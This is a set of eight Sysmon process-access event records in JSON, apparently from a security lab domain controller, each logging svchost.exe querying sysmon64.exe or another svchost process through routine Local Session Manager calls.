{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
